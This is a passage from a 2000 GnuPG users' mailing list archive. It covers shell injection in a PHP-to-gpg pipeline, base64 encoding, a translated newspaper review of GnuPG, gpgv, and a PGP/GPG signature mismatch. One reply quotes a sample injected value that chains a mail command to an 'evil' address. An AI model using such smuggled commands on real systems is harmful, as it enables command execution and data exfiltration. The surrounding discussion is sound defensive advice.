to base64? ----- Original Message ----- From: "Jason Martin" To: "Derek Vokey" Cc: Sent: Monday, December 04, 2000 5:05 PM Subject: Re: possible security hole > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > I believe posible exploits are if $sensitiveinfo contains things like > "blah; mail someone.evil@hacker.org shell can be tricked depending on $sensitiveinfo to do things you don't > intend. Maybe if you base64 encode $sensitiveinfo first you'll be > more-or-less immune from shell exploits. From a purely crypto point of > view; I don't see anything wrong with this if we assume that > $sensitiveinfo is guarenteed to have shell-safe values. > > - -Jason Martin > > > "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear me|mail > > to\@me.com" > > > > the script runs as nobody > > the secret key has never seen the server > > the script only encrypts > > I don't care who the message comes from I only want the $sensitiveinfo > > - -- > PGP KeyID=0xEA954813 > Fingerprint:3B07 518C D76E 572F 7DAA 88A5 9763 835A EA95 4813 > finger jhmartin@pitr.scs.wsu.edu for key > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.4 (GNU/Linux) > Comment: For info see http://www.gnupg.org > Filter: gpg4pine 4.1 (http://azzie.robotics.net) > > iQEMBAERAgDMBQI6LD9snRSAAAAAAAgAjEdlZWtDb2RlIkdDUyBkLSBzKzogYS0t > IEMrKyBVTCsrKysgUCsrIEwrKysgRS0tLSBXKysrIE4rKyBvLS0gSy0gdy0tLSBP > LSBNLS0gVi0tIFBTKysgUEUgWSsrKyBQR1ArKysgdCsrKyA1KysgWCsgUiB0disg > YisgREkrKysrIEQgRy0tIGUrKyBoIHIrKyB5PyIUFIAAAAAACQACU2xpbVNoYWR5 > bm8SFIAAAAAABgADTm9va2lleWVzAAoJEJdjg1rqlUgThWwAn1t+IvCo+II8Ey+2 > bGOvoUdPUac7AJ9wkqxWKGFJIHZqWlsNJ81K//2Tjw== > =xi3u > -----END PGP SIGNATURE----- > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From sen_ml@eccosys.com Tue Dec 5 03:11:40 2000 From: sen_ml@eccosys.com (sen_ml@eccosys.com) Date: Tue, 05 Dec 2000 12:11:40 +0900 (JST) Subject: base 64 encoding pointers (was Re: possible security hole) In-Reply-To: <000601c05e7b$fe8fd000$01a800c0@derekvok> References: <000601c05e7b$fe8fd000$01a800c0@derekvok> Message-ID: <20001205.121140.46593049.sen_ml@eccosys.com> From: "Derek Vokey" Subject: Re: possible security hole Date: Mon, 4 Dec 2000 21:26:59 -0800 > Could I bother you to "briefly" explain encoding to base64? iirc, documentation for base64 can be found in the mime-related rfcs (let's take a look now...hmmm...yes, it appears that section 6.8 of rfc 2045 has a description). it's also mentioned in the openpgp rfc (rfc 2440) for obvious reasons. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jhmartin@mail.com Tue Dec 5 03:23:01 2000 From: jhmartin@mail.com (Jason Martin) Date: Mon, 4 Dec 2000 19:23:01 -0800 (PST) Subject: possible security hole In-Reply-To: <000601c05e7b$fe8fd000$01a800c0@derekvok> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >briefly explain encoding to base64 It takes binary (and text) input and uses A-Za-z0-9 and = to encode the data in one long string. It is equivalent to uuencoding. It is a clean way to bandy about 'dirty' strings. PHP has a function base64_encode() and base64_decode() to handle this. I recommend you encode the data as such before handing it off to gpg. Decoding can be done with any number of tools, one being 'mimencode -u' under linux. uudecode -m can probably do it too. > > shell can be tricked depending on $sensitiveinfo to do things you don't > > intend. Maybe if you base64 encode $sensitiveinfo first you'll be > > more-or-less immune from shell exploits. From a purely crypto point of > > view; I don't see anything wrong with this if we assume that > > $sensitiveinfo is guarenteed to have shell-safe values. > > > > > "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear > me|mail > > > to\@me.com" > > > > > > the script runs as nobody > > > the secret key has never seen the server > > > the script only encrypts > > > I don't care who the message comes from I only want the $sensitiveinfo - -- Cats have nine lives - but sleep through eight of them. PGP KeyID=0xEA954813 Fingerprint:3B07 518C D76E 572F 7DAA 88A5 9763 835A EA95 4813 finger jhmartin@pitr.scs.wsu.edu for key -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org Filter: gpg4pine 4.1 (http://azzie.robotics.net) iQEMBAERAgDMBQI6LF+lnRSAAAAAAAgAjEdlZWtDb2RlIkdDUyBkLSBzKzogYS0t IEMrKyBVTCsrKysgUCsrIEwrKysgRS0tLSBXKysrIE4rKyBvLS0gSy0gdy0tLSBP LSBNLS0gVi0tIFBTKysgUEUgWSsrKyBQR1ArKysgdCsrKyA1KysgWCsgUiB0disg YisgREkrKysrIEQgRy0tIGUrKyBoIHIrKyB5PyIUFIAAAAAACQACU2xpbVNoYWR5 bm8SFIAAAAAABgADTm9va2lleWVzAAoJEJdjg1rqlUgT7UcAoJHzmzI87ipvjwg5 7cfk3HzHnK6CAJ47ZgBHMRCk26hKnLGbclOzV00Mrg== =2U4p -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Ralf.Huels@schufa.de Tue Dec 5 06:58:31 2000 From: Ralf.Huels@schufa.de (Huels, Ralf KSV) Date: 5 Dec 2000 07:58:31 +0100 Subject: Gnu-pg reviewed by german newspaper Message-ID: <51896D38E5E4D111BE560001FA68BA368456B2@SBO1002> > -----Ursprüngliche Nachricht----- > Von: Gregor Zattler [SMTP:telegraph@gmx.net] > Gesendet am: Montag, 4. Dezember 2000 22:20 > An: gnupg-users@gnupg.org > Betreff: Gnu-pg reviewed by german newspaper > > > Hi folks, > > this -- not very good -- article was published at September, > 29th in the german newspaper "Die Welt" (the world). "Die Welt" is an > very conservative newspaper with very god connections to german > security apparatus (military, services and police). It favours gpg > over pgp for security reasons. > > Sorry, no > translation: > > -------------cut-------- > > Bestmögliche Verschlüsselung für E-Mails > > Alternative zum Klassiker PGP: Warum die Kryptographie-Software > Gnu-PG besser als die Konkurrenz ist > > Von Marcus Höfer > > Das populäre Verschlüsselungsprogramm Pretty Good Privacy (PGP) hat > eine ernst zu nehmende Konkurrenz bekommen: Gnu Privacy Guard > (Gnu-PG). Sicherheitsexperten aus aller Welt bezeichnen das Programm > als eines der besten Verschlüsselungssysteme auf dem Markt. Sogar von > offizieller Seite gibt es Unterstützung. So gehört beispielsweise das > Bundeswirtschaftsministerium zu den Förderern des > Programms. Tatsächlich hat eine E-Mail de facto den Status einer > Postkarte. Praktisch kann jeder die Nachricht mitlesen. Er kann sie > sogar ohne Wissen von Absender und Empfänger verändern und an den > Adressaten weiterleiten. Wer das verhindern will, muss ein > Verschlüsselungsprogramm nutzen. Die mit Abstand populärste Software > ist Pretty Good Privacy. Doch einige offen gelegte Schwachstellen > haben viele Anwender verschreckt. > > Das Verschlüsselungsprogramm Pretty Good Privacy galt bei seiner > Vorstellung als absolut sicheres System. Ist PGP beim Sender und > Empfänger im Einsatz, wird das Mitlesen vertraulicher Mails durch > Dritte nahezu ausgeschlossen. PGP überprüft automatisch, ob die Mail > während des Transports vom Absender zum Empfänger verändert wurde, und > liefert eine hochgradig sichere digitale Unterschrift. Das verwendete > Verfahren zur Verschlüsselung bietet eine enorme Zahl von > verschiedenen Schlüsseln. Ein nach heutigen Maßstäben nicht knackbarer > Wert. > > Doch PGP ist in die Kritik geraten. Zwar wird die Software mit dem > Quelltext ausgeliefert, doch einige Geheimnisse will der Hersteller > für sich behalten. So erlaubt PGP die Einrichtung von Drittschlüsseln, > wodurch viele Anwender das Vertrauen in die Sicherheitssoftware > verloren haben. Bereits seit geraumer Zeit kursieren Gerüchte, dass > staatliche Organisationen wie zum Beispiel die US-Datenpolizei > National Security Agency (NSA) verschlüsselte Mails mit Hilfe eines > Generalschlüssels mitlesen können. Sicherheitsexperten warnen deshalb > schon lange davor, PGP blind zu vertrauen. Anders sieht es beim Gnu > Privacy Guard aus. Das kostenlose Programm wird von vielen > "Freizeitprogrammierern" ständig verbessert und erweitert. Da dazu der > gesamte Quelltext zur Verfügung stehen muss, können auch keine > geheimen Hintertüren eingebaut werden. Erstmals wurde Gnu-PG vom > Düsseldorfer Werner Koch im September 1999 für das Betriebssystem Unix > vorgestellt. Seitdem ist die Software für zahlreiche andere Systeme > erhältlich, darunter auch für Windows 9x, Windows NT, Linux, OS/2 und > Sun-OS. > > > (c) Die WELT online > > http://www.welt.de > > > -------------cut again --------- > > Ciao, Gregor > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org -- Ralf Hüls Bismarckplatz KSV Kreditschutz-Vereinigung GmbH 44866 Bochum Score-Consult Tel. 02327/9114-28 http://www.schufa.de/ Fax. 02327/8 40 27 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Tue Dec 5 07:33:29 2000 From: wk@gnupg.org (Werner Koch) Date: Tue, 5 Dec 2000 08:33:29 +0100 Subject: possible security hole In-Reply-To: <000c01c05e68$c1667160$01a800c0@derekvok>; from turfdog@planetturf.ca on Mon, Dec 04, 2000 at 07:08:16PM -0800 References: <000c01c05e68$c1667160$01a800c0@derekvok> Message-ID: <20001205083329.A20381@gnupg.de> On Mon, 4 Dec 2000, Derek Vokey wrote: > "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear me|mail > to\@me.com" I don't know PHP, but I assume that you are using something like system(3) to this job. The problem is that you might be able to trick the shell in doing evil thing by having shell code in $seinsitiveinfo. Some possible solutions: * sanitize $sensitiveinfo by removing all characters except for digits, underscore, space and letters :-) * use fork/exec to run gpg * write the data to a temp string and feed it to gpg. * use something like popen(3) and feed it with $sensitiveinfo Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Ralf.Huels@schufa.de Tue Dec 5 07:34:10 2000 From: Ralf.Huels@schufa.de (Huels, Ralf KSV) Date: 5 Dec 2000 08:34:10 +0100 Subject: Gnu-pg reviewed by german newspaper Message-ID: <51896D38E5E4D111BE560001FA68BA368456B3@SBO1002> Sorry, I just sent this to the list without adding my comments. I hate point-and-click user interfaces they facilitate everything, including shooting yourself in the foot %-) > Sorry, no > translation: Well, the least we could do is a brief summary. > -------------cut-------- > > Bestmögliche Verschlüsselung für E-Mails > > Alternative zum Klassiker PGP: Warum die Kryptographie-Software > Gnu-PG besser als die Konkurrenz ist > > Von Marcus Höfer Best possible encryption for e-mails. An alternative to classic PGP: why crypto-s/w GnuPG is better than the competition by Marcus Höfer. > Das populäre Verschlüsselungsprogramm Pretty Good Privacy (PGP) hat > eine ernst zu nehmende Konkurrenz bekommen: Gnu Privacy Guard > (Gnu-PG). Sicherheitsexperten aus aller Welt bezeichnen das Programm > als eines der besten Verschlüsselungssysteme auf dem Markt. Sogar von > offizieller Seite gibt es Unterstützung. So gehört beispielsweise das > Bundeswirtschaftsministerium zu den Förderern des > Programms. PGP has new competition in gpg. Security experts around the world call it one of the best encryption programs. There is also official support e.g. the grant from the german Ministry of Commerce. > Tatsächlich hat eine E-Mail de facto den Status einer > Postkarte. Praktisch kann jeder die Nachricht mitlesen. Er kann sie > sogar ohne Wissen von Absender und Empfänger verändern und an den > Adressaten weiterleiten. Wer das verhindern will, muss ein > Verschlüsselungsprogramm nutzen. Die mit Abstand populärste Software > ist Pretty Good Privacy. Doch einige offen gelegte Schwachstellen > haben viele Anwender verschreckt. This explains the insecurity of e-mail and the need for encryption. It mentions PGP as the most popular tool and states that weaknesses found in PGP have deterred many of its users. > Das Verschlüsselungsprogramm Pretty Good Privacy galt bei seiner > Vorstellung als absolut sicheres System. Ist PGP beim Sender und > Empfänger im Einsatz, wird das Mitlesen vertraulicher Mails durch > Dritte nahezu ausgeschlossen. PGP überprüft automatisch, ob die Mail > während des Transports vom Absender zum Empfänger verändert wurde, und > liefert eine hochgradig sichere digitale Unterschrift. Das verwendete > Verfahren zur Verschlüsselung bietet eine enorme Zahl von > verschiedenen Schlüsseln. Ein nach heutigen Maßstäben nicht knackbarer > Wert. This explains that PGP is used to encrypt and sign e-mail. The system used provides a tremendous amount of possible keys. A number not breakable by current standards. > Doch PGP ist in die Kritik geraten. Zwar wird die Software mit dem > Quelltext ausgeliefert, doch einige Geheimnisse will der Hersteller > für sich behalten. So erlaubt PGP die Einrichtung von Drittschlüsseln, > wodurch viele Anwender das Vertrauen in die Sicherheitssoftware > verloren haben. Bereits seit geraumer Zeit kursieren Gerüchte, dass > staatliche Organisationen wie zum Beispiel die US-Datenpolizei > National Security Agency (NSA) verschlüsselte Mails mit Hilfe eines > Generalschlüssels mitlesen können. Sicherheitsexperten warnen deshalb > schon lange davor, PGP blind zu vertrauen. This states that while PGP is provided as source code, there are some secrets that the distributor wants to keep. The ADK system is mentioned. The text also mentions the rumours about the NSA being able to use a back door. "Thus, security experts have been warning us against indiscriminately trusting PGP for quite some time." > Anders sieht es beim Gnu > Privacy Guard aus. Das kostenlose Programm wird von vielen > "Freizeitprogrammierern" ständig verbessert und erweitert. Da dazu der > gesamte Quelltext zur Verfügung stehen muss, können auch keine > geheimen Hintertüren eingebaut werden. GnuPG is deifferent. Free of cost and constantly improved by hobbyist programmers. Due to the entire source code being available, there can be no back doors. > Erstmals wurde Gnu-PG vom > Düsseldorfer Werner Koch im September 1999 für das Betriebssystem Unix > vorgestellt. Seitdem ist die Software für zahlreiche andere Systeme > erhältlich, darunter auch für Windows 9x, Windows NT, Linux, OS/2 und > Sun-OS. GnuPG was introduced by WK in 1999 for Unix and has since become available for several platforms. > (c) Die WELT online > > http://www.welt.de > > > -------------cut again --------- Thanks, Gregor. I thought the article was rather vague on some of the issues. Not surprisingly, the general principles of public key encryption were glossed over. You would expect that in that short a text. But the ADK issue is adressed rather passingly, as compared to the back door rumors. The text was less than I would expect from a newspaper of "Die Welt"´s standing. Still, good advertisement, I guess. Again sorry for the previous post. Tschüß, Ralf -- Ralf Hüls Bismarckplatz KSV Kreditschutz-Vereinigung GmbH 44866 Bochum Score-Consult Tel. 02327/9114-28 http://www.schufa.de/ Fax. 02327/8 40 27 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Tue Dec 5 07:40:29 2000 From: wk@gnupg.org (Werner Koch) Date: Tue, 5 Dec 2000 08:40:29 +0100 Subject: smaller GPG for signature checking only In-Reply-To: ; from bruce_horton@hotmail.com on Mon, Dec 04, 2000 at 09:57:50PM -0000 References: Message-ID: <20001205084029.B20381@gnupg.de> On Mon, 4 Dec 2000, Bruce Horton wrote: > I *ONLY* need to be able to check that a signed file is > valid. No need for general purpose encryption or signing, etc... since 1.0.4, gnupg comes with a tool named gpgv which does exactly what you want. It is smaller than gpg but still quite large. If you need a really slim verification tool, have a look at SFSV (ftp://ftp.guug.de/pub/members/wkoch/crypto/). This is a tool to OpenPGP sign an ELF file and embed the signature in the ELF file. The library part then can be used by the ELF loader to check that signature. It is not very fast but the memory footprint is about 18k. useful for embedded systems to check. It is GPLed; if you have problems with this, please contact me privately. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Tue Dec 5 12:34:07 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Tue, 5 Dec 2000 13:34:07 +0100 Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 Message-ID: <00120513321202.18426@atlas> --------------Boundary-00=_VKH351O302IGJLA6Q69Q Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, yesterday i received the attached and pgp signed email. It has been signed by PGP 5.0i with the counterpart of the attached key. (I attached the key twice. The first one is the key Michael send me and the second one is Michael's public key reexported via GPG.) The problem is that PGP 5.0i and PGP 6.5.8 both tell me that the signature is good. But GPG 1.0.4 says the signature is bad. I looked in the FAQ, the HowTos, the GPH and the mailing list archive but I still got no clue. The only thing a remarked was that the output of PGP (both versions) is one byte (a LF) shorter than the output of GPG. But removing the last LF before "-----BEGIN PGP SIGNATURE" didn't help, although GPG then produced the same output as PGP. I also tried all available hash algorithms and --force-v3-sigs without success. Where is the problem? Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6LODAqUQWN/hplRsRAhI7AJwIjlOu4AcjkSNacz7Mc9UTCFqKuQCghKr7 Htvmp6ldCIXqIDTeWLLSrjo= =0b/V -----END PGP SIGNATURE----- --------------Boundary-00=_VKH351O302IGJLA6Q69Q Content-Type: message/rfc822; charset="iso-8859-1"; name="michael-0512-latin1.mail" Content-Transfer-Encoding: 7bit Content-Description: the signed email Content-Disposition: attachment; filename="michael-0512-latin1.mail" >From Michael.Haeckel@stud.uni-bayreuth.de Mon Dec 4 21:54:03 2000 Received: from nets5.rz.rwth-aachen.de (nets5.rz.RWTH-Aachen.DE [137.226.144.13]) by helena.mathA.rwth-aachen.de (SGI-8.9.3/8.9.3) with ESMTP id VAA25820 for ; Mon, 4 Dec 2000 21:55:27 +0100 (MET) Received: from mout1.freenet.de (exim@mout1.freenet.de [194.97.50.132]) by nets5.rz.rwth-aachen.de (8.10.1/8.10.1/5) with ESMTP id eB4KtQm29467 for ; Mon, 4 Dec 2000 21:55:27 +0100 (MET) Received: from [194.97.50.138] (helo=mx0.freenet.de) by mout1.freenet.de with esmtp (Exim 3.20 #2) id 1432dF-0001XM-00 for ingo@matha.rwth-aachen.de; Mon, 04 Dec 2000 21:54:41 +0100 Received: from aff94.pppool.de ([213.6.255.148] helo=michael) by mx0.freenet.de with smtp (Exim 3.20 #2) id 1432dE-0007Oi-00 for ingo@mathA.rwth-aachen.de; Mon, 04 Dec 2000 21:54:40 +0100 Content-Type: text/plain; charset="iso-8859-1" From: Michael Haeckel To: Ingo Kloecker Subject: Re: PATCH: Bug#16362: gpg: only latin1 messages can be signed correctly Date: Mon, 4 Dec 2000 21:54:03 +0100 X-Mailer: KMail [version 1.2] References: <200012011727.SAA06497@helena.mathA.rwth-aachen.de> <00120410594100.02469@michael> <0012042056230B.12541@atlas> In-Reply-To: <0012042056230B.12541@atlas> X-Accept-Language: de, en MIME-Version: 1.0 Message-Id: <00120421540300.05232@michael> Content-Transfer-Encoding: 8bit Status: R X-Status: N -----BEGIN PGP SIGNED MESSAGE----- On Monday, 4. December 2000 20:56, you wrote: > > Ich habe deine Mail mit der laut GPG fehlerhaften Signatur mal > angehaengt (von KMail aus abgespeichert). Auch bei manueller > Ueberpruefung der abgespeicherten Mail meldet GPG eine fehlerhafte > Signatur. Die zweite von dir signierte Mail (PATCH2: Bug#16362 ...) hat > uebrigens auch eine fehlerhafte Signatur. Laut PGP hier immer noch korrekt. Die Signaturen deiner Mails werden hier von PGP auch als korrekt gemeldet, nachdem ich deinen Schlüssel in meine Liste aufgenommen habe. Kann es sein, daß ich die selbe Adresse im From: header verwenden muß, als ich für den Schlüssel verwendet habe? In diesem Mail mache ich das einmal. > Weisst du zufaellig welche Schriftart du als utf-8-Font installiert > hast? Aendert sich die Schriftart beim Wechsel von koi8-r encoding zu > utf-8 encoding? Bei mir sieht die utf-8 Schrift genau so aus wie die > latin1 Schrift, waehrend die koi8-r Schrift deutlich breiter ist. Als unicode Font habe ich Fixed, die Kodierung heißt nicht utf-8, sondern iso10646-1. Das mit der Breite ist bei mir auch ähnlich. Seit ich nur noch unicode für die Mails verwende natürlich nicht mehr. Viele Grüße, Michael Häckel -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use MessageID: GL8h9oWzVePQQFZx6lH+o7j1Lonkn4s5 iQA/AwUAOiwEbg7c1ZAtjdZKEQKE7QCgkXiIoOK+k2vSkofNawgpmRn/8aUAn2QL kl9QzHkWk6Pve1MfGix7NP6o =2uo3 -----END PGP SIGNATURE----- --------------Boundary-00=_VKH351O302IGJLA6Q69Q Content-Type: text/plain; charset="iso-8859-1"; name="michael_haeckel_public_key.asc" Content-Transfer-Encoding: base64 Content-Description: Michael Haeckel's public key Content-Disposition: attachment; filename="michael_haeckel_public_key.asc" LS0tLS1CRUdJTiBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tClZlcnNpb246IFBHUGZyZWV3YXJl IDUuMGkgZm9yIG5vbi1jb21tZXJjaWFsIHVzZQoKbVFHaUJEanRxYkFSQkFEZTNzanpqM0dqT2xW cVJYMkN0SUtmRWV6azNaSGlYS0lwWDNmckliVWlRbHZ3VE9NYQpWNmdWaU91aGZqdUZ0eldFcnlD azhvK3lzb01XNVVpblk5NHJlNEk2Qyt4R0prZS9tcURXb3ZsbzVGV0dtZDFxCms0em5CeE9wNVIr ZU9Nbm5aMDEwZlNQODJvcDlmZ0Z6UUpEbDNMSkIwSktOQ0VRY2kzVHBuK3Y5N3dDZy8vWlcKc01F TWE4c3ZuN0Z5eGZoL0xuL2FXUThFQUtUZkM3Q1J2WnEvUEZ1K0xpN1BHSmdrQzlJZkVWTTRtRExO dXNDMQpnclIzQzdmdW42dk5VMHVnS3prQVdydE5DWmFjT1BxdDhueTRGR0loV3dHdjNjYTZrMEls dTllTzlwMUhQMWlJCk1zbjI3NGRVWE5Qd09BWXlUblhCRWw0Z0xraStPT2NtSGNkY05FOCtuRHpz V25RRUJYUzArYnEvdFJrcjhpcHkKa045dEEvOUF4RVZsVWxkaVZpamVLZ0l0RnF1T0xCUkphU0tx OHYwaTN6VXlVMWlCMXFDMDdDejVFdFpMbmwxNgpqNUd1YjJMbFJWWDVha3dGRVFqS3ZvcGFiY0xZ Z1ZleHF2NGQ4U1c1MmRrcnc1R2xPSDlkcnZpRzFJcG9Wdk94ClhLYWp4STBoaElsYXp4WW5CRlQ4 WWpCWFpzV2dvOGJvaDdyWVFBVEJ3cXllMHM3VkZyUTJUV2xqYUdGbGJDQkkKWVdWamEyVnNJRHhO YVdOb1lXVnNMa2hoWldOclpXeEFjM1IxWkM1MWJta3RZbUY1Y21WMWRHZ3VaR1UraVFCTApCQkFS QWdBTEJRSTQ3YW13QkFzREFRSUFDZ2tRRHR6VmtDMk4xa3JFUFFDZUwxWjM0WTVGR3JUcGpUWVNR UStoCmIvUW9qVVVBbjE3RzV0aDd1aTFJWFEyZzRzM1phM283SHRVRXVRRU5CRGp0cWI0UUJBRG5k akgrUXlRMldBN3QKUTZBSFpVY09HeklUNk1odGlEYmxMOXpXVm5MNWxYNkZPemc1cVZiaHNFSTY0 UEFLSFRTb3ZUSDdMeWFNajB2SgpkZEtlRDhYWGtmcnplOTZyQjErV09pS3VJNmphbGsxdko5Z0Jz S0hGRVVFU0FtcnoxdkR6TjFMT2xXakZINjNiCnVKVndFenhmUEFWcjFpTGQvVTVGY1lBZDZ0akJB UUFDQWdRQTRMQWpjelNyci9sK1dIcmdJdHg0OUo1TTB1VnkKdmNucGxRc0NQMW9yemovL1M4OVNZ UkZhaHE0ZkQ2cWVmV2RjU0RLUWkwZU1wTS9LNGlJNEc1ZmcySloxanJFcApXclZac20wR1h2Q1k3 MFR1NTIvSzFXeUQ3dm5UcVZzSGNDYUxiM2N1YUpjMmlFUlJuZkNURnBlWVRVaDNsVzc2CjlnRkxU cGlLQmIwQ1VRaUpBRDhEQlJnNDdhbStEdHpWa0MyTjFrb1JBZzJmQUo5Qys3K3JOUlVKNkNnQXll Tm4KUUlGa004Um04Z0NnN3k0QjVQWmx4QTRCV093QUh1SCtiNmZ1TXVZPQo9UFVoeQotLS0tLUVO RCBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tCg== --------------Boundary-00=_VKH351O302IGJLA6Q69Q Content-Type: application/pgp-keys; name="public_key.asc" Content-Transfer-Encoding: base64 Content-Description: Michael Haeckel's key reexported via GPG Content-Disposition: attachment; filename="public_key.asc" LS0tLS1CRUdJTiBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tClZlcnNpb246IEdudVBHIHYxLjAu NCAoR05VL0xpbnV4KQpDb21tZW50OiBGb3IgaW5mbyBzZWUgaHR0cDovL3d3dy5nbnVwZy5vcmcK Cm1RR2lCRGp0cWJBUkJBRGUzc2p6ajNHak9sVnFSWDJDdElLZkVlemszWkhpWEtJcFgzZnJJYlVp UWx2d1RPTWEKVjZnVmlPdWhmanVGdHpXRXJ5Q2s4byt5c29NVzVVaW5ZOTRyZTRJNkMreEdKa2Uv bXFEV292bG81RldHbWQxcQprNHpuQnhPcDVSK2VPTW5uWjAxMGZTUDgyb3A5ZmdGelFKRGwzTEpC MEpLTkNFUWNpM1Rwbit2OTd3Q2cvL1pXCnNNRU1hOHN2bjdGeXhmaC9Mbi9hV1E4RUFLVGZDN0NS dlpxL1BGdStMaTdQR0pna0M5SWZFVk00bURMTnVzQzEKZ3JSM0M3ZnVuNnZOVTB1Z0t6a0FXcnRO Q1phY09QcXQ4bnk0RkdJaFd3R3YzY2E2azBJbHU5ZU85cDFIUDFpSQpNc24yNzRkVVhOUHdPQVl5 VG5YQkVsNGdMa2krT09jbUhjZGNORTgrbkR6c1duUUVCWFMwK2JxL3RSa3I4aXB5CmtOOXRBLzlB eEVWbFVsZGlWaWplS2dJdEZxdU9MQlJKYVNLcTh2MGkzelV5VTFpQjFxQzA3Q3o1RXRaTG5sMTYK ajVHdWIyTGxSVlg1YWt3RkVRakt2b3BhYmNMWWdWZXhxdjRkOFNXNTJka3J3NUdsT0g5ZHJ2aUcx SXBvVnZPeApYS2FqeEkwaGhJbGF6eFluQkZUOFlqQlhac1dnbzhib2g3cllRQVRCd3F5ZTBzN1ZG clEyVFdsamFHRmxiQ0JJCllXVmphMlZzSUR4TmFXTm9ZV1ZzTGtoaFpXTnJaV3hBYzNSMVpDNTFi bWt0WW1GNWNtVjFkR2d1WkdVK2lFc0UKRUJFQ0FBc0ZBamp0cWJBRUN3TUJBZ0FLQ1JBTzNOV1FM WTNXU3NROUFKNHZWbmZoamtVYXRPbU5OaEpCRDZGdgo5Q2lOUlFDZlhzYm0ySHU2TFVoZERhRGl6 ZGxyZWpzZTFRUzVBUTBFT08ycHZoQUVBT2QyTWY1REpEWllEdTFECm9BZGxSdzRiTWhQb3lHMklO dVV2M05aV2N2bVZmb1U3T0RtcFZ1R3dRanJnOEFvZE5LaTlNZnN2Sm95UFM4bDEKMHA0UHhkZVIr dk43M3FzSFg1WTZJcTRqcU5xV1RXOG4yQUd3b2NVUlFSSUNhdlBXOFBNM1VzNlZhTVVmcmR1NAps WEFUUEY4OEJXdldJdDM5VGtWeGdCM3EyTUVCQUFJQ0JBRGdzQ056Tkt1ditYNVlldUFpM0hqMG5r elM1WEs5CnllbVZDd0kvV2l2T1AvOUx6MUpoRVZxR3JoOFBxcDU5WjF4SU1wQ0xSNHlrejhyaUlq Z2JsK0RZbG5XT3NTbGEKdFZteWJRWmU4Smp2Uk83bmI4clZiSVB1K2RPcFd3ZHdKb3R2ZHk1b2x6 YUlSRkdkOEpNV2w1aE5TSGVWYnZyMgpBVXRPbUlvRnZRSlJDSWcvQXdVWU9PMnB2ZzdjMVpBdGpk WktFUUlObndDZlF2dS9xelVWQ2Vnb0FNbmpaMENCClpEUEVadklBb084dUFlVDJaY1FPQVZqc0FC N2gvbStuN2pMbQo9WEZXMQotLS0tLUVORCBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tCg== --------------Boundary-00=_VKH351O302IGJLA6Q69Q-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Florian.Weimer@RUS.Uni-Stuttgart.DE Tue Dec 5 12:31:28 2000 From: Florian.Weimer@RUS.Uni-Stuttgart.DE (Florian Weimer) Date: 05 Dec 2000 13:31:28 +0100 Subject: possible security hole In-Reply-To: <20001205083329.A20381@gnupg.de> References: <000c01c05e68$c1667160$01a800c0@derekvok> <20001205083329.A20381@gnupg.de> Message-ID: Werner Koch writes: > On Mon, 4 Dec 2000, Derek Vokey wrote: > > > "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear me|mail > > to\@me.com" > > I don't know PHP, but I assume that you are using something like > system(3) to this job. The problem is that you might be able to > trick the shell in doing evil thing by having shell code in > $seinsitiveinfo. > > Some possible solutions: > > * sanitize $sensitiveinfo by removing all characters except for > digits, underscore, space and letters :-) If you do this, other (non-privileged) users on the same machine are able to retrieve $sensitiveinfo by examining the environment of the shell process. -- Florian Weimer Florian.Weimer@RUS.Uni-Stuttgart.DE University of Stuttgart http://cert.uni-stuttgart.de/ RUS-CERT +49-711-685-5973/fax +49-711-685-5898 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Tue Dec 5 13:42:07 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Tue, 05 Dec 2000 13:42:07 GMT Subject: bad sig with gpg but good sig with pgp5.0i and pgp6.5.8 In-Reply-To: <00120513321202.18426@atlas> References: <00120513321202.18426@atlas> Message-ID: <20001205133957.33E3.GRAHAM@todd276.worldonline.co.uk> Hi there, Ingo Kloecker, On 05 December 2000, I received the following message from you regarding "bad sig with gpg but good sig with pgp5.0i and pgp6.5.8" IK> The problem is that PGP 5.0i and PGP 6.5.8 both tell me that the IK> 